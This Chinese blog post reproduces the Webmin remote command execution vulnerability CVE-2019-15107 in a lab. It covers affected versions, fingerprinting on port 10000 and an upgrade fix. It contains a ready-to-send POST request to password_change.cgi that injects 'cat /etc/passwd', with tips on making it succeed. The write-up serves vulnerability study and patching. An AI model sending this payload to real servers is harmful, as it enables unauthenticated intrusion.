码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Webmin远程命令执行漏洞复现


    文章目录

    • Webmin_1.910_rce(CVE-2019-15107)
          • 漏洞编号
          • 漏洞描述
          • 影响版本
          • 漏洞评级
          • 利用方法(利用案例)
          • 漏洞挖掘
          • 加固建议
          • 参考信息
          • 漏洞分类

    Webmin_1.910_rce(CVE-2019-15107)

    漏洞编号

    CVE-2019-15107

    漏洞描述

    Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

    详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码

    影响版本

    Webmin<=1.920

    漏洞评级

    严重

    利用方法(利用案例)

    参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

    payload

    payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。

    发送如下数据包即可执行命令:cat /etc/passwd

    POST /password_change.cgi HTTP/1.1
    Host: your-ip:10000
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: redirect=1; testing=1; sid=x; sessiontest=1
    Referer: https://your-ip:10000/session_login.cgi
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 73
    
    user=rootxx&pam=&expired=2&old=test|cat+/etc/passwd&new1=test2&new2=test2
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13

    image-20231012170921843

    漏洞挖掘

    指纹特征

    查找webmin指纹

    image-20231012172248965

    默认端口

    10000是这个系统的默认端口

    在目标网站访问这个url:/password_change.cgi

    若出现以下界面,说明很可能存在漏洞:

    image-20231012172036074

    加固建议

    升级到1.930版本

    参考信息

    https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

    https://www.exploit-db.com/exploits/47230

    https://blog.firosolutions.com/exploits/webmin/

    https://vulhub.org/#/environments/webmin/CVE-2019-15107/

    https://blog.csdn.net/weixin_43486390/article/details/111591676

    漏洞分类

    远程命令执行漏洞(RCE)

  • 相关阅读:
    STL标准模板库(Standard Template Library)一周学习总结
    Map合并、根据value排序(热词)
    入职美团Java岗后,美团人事分享给了我一份面试笔记......
    sql order by 排序 null值放最后,怎么写
    基于深度学习视觉算法的多模型文件融合检测系统设计与实现及优化(工人姿态检测+安全帽佩戴检测系统)
    快车蜘蛛池站群程序 v2.0
    Llama2-Chinese项目:2.1-Atom-7B预训练
    Feign实现文件上传下载
    pytest --version报错
    学编程的第二十二天
  • 原文地址:https://blog.csdn.net/weixin_46367450/article/details/133795557
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号